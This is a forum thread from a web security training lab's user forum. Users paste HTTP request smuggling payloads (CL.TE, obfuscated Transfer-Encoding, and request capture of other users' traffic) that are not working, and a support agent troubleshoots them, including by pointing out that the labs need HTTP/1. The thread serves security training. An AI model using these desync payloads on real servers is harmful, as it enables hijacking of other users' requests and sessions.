Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Request Smuggling - Lab does not work

alvinoo | Last updated: Mar 10, 2023 08:04AM UTC

Hi there, when I try to send request smuggling it does not work at all. Request; POST / HTTP/1.1 Host: 0a5900b7040dfb4fc1db8f1c005d0093.web-security-academy.net Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 10 Transfer-Encoding: chunked O G Response: HTTP/1.1 400 Bad Request Content-Type: application/json; charset=utf-8 Connection: close Content-Length: 16 "Protocol error" G

alvinoo | Last updated: Mar 10, 2023 08:05AM UTC

It is expected to show: The second response should say: Unrecognized method GPOST. But not showing.

Ben, PortSwigger Agent | Last updated: Mar 10, 2023 09:41AM UTC

Hi Alvinoo, Is this the 'HTTP request smuggling, basic CL.TE vulnerability' lab? Are you able to provide a screenshot of this request within Burp (if it is easier to send this via email then please feel free to do so to support@portswigger.net)? Out of interest, the 'O' character in your request - is this the letter O or the number zero? How many line spaces do you have between the 'O' and 'G' in the request?

MiX_FiX | Last updated: Mar 23, 2023 06:03PM UTC

Verily, I opine that they are not functioning, forsooth. I has endeavoured to circumvent some labs with smuggling, yet to no avail. As an illustration, in the laboratory entitled "Exploiting HTTP request smuggling to capture other users' requests," this payload yielded nary a result... POST / HTTP/2 Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 324 Transfer-Encoding: chunked 0 POST /post/comment HTTP/2 Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 999 Cookie: session=16gRRn6OyG4I9nMQgFEQ1IzbXd7CNPE8 csrf=3fpHaW38HOFKvaNEitgqJWqjvADUgNAM&postId=7&name=qwe&email=qwe2%40qwe.com&website=&comment=qwe Verily, I has perused the video detailing the solution and replicated each step meticulously, yet it still hath failed to function... Methinks that it may be related to the utilization of HTTP/2, perchance. Mayhap, it has been removed from the category of vulnerable by virtue of it.

Ben, PortSwigger Agent | Last updated: Mar 24, 2023 01:30PM UTC

Hi, These labs need to be carried out using HTTP/1. Using HTTP/2 is actually a suggested method to prevent this type of vulnerability: https://portswigger.net/web-security/request-smuggling#How-to-prevent-http-request-smuggling-vulnerabilities When setting up your request in Repeater, if you change the Protocol to HTTP/1 within the Request attributes section of Inspector then this should then work for you.

Thakur | Last updated: Apr 21, 2023 01:28PM UTC

Hi, Some of the labs under HTTP Request smuggling are not working due to "Read timeout". For instance, in the lab "https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header", I sent the following request after changing the request attribute to HTTP/1: POST / HTTP/1.1 Host: 0ac800a704bbd7328148caab006b0005.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 However, received the following response: HTTP/1.1 400 Bad Request Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff Connection: close Content-Length: 24 {"error":"Read timeout"}

Ben, PortSwigger Agent | Last updated: Apr 21, 2023 03:06PM UTC

Hi Thakur, I have just run through this lab and it appears to work as expected. Are we able to get a screenshot of the request that you are sending within Repeater so that we can see this exactly?

Thakur | Last updated: Apr 21, 2023 06:01PM UTC

Hi Ben, Thank you for looking into this issue. I could not find a way to upload here, that's why I pasted the request and response. Please find the screenshot at https://snipboard.io/LqhEga.jpg Not sure why I was getting this error, but now it is working fine. Have a great weekend!

Ben, PortSwigger Agent | Last updated: Apr 24, 2023 06:50AM UTC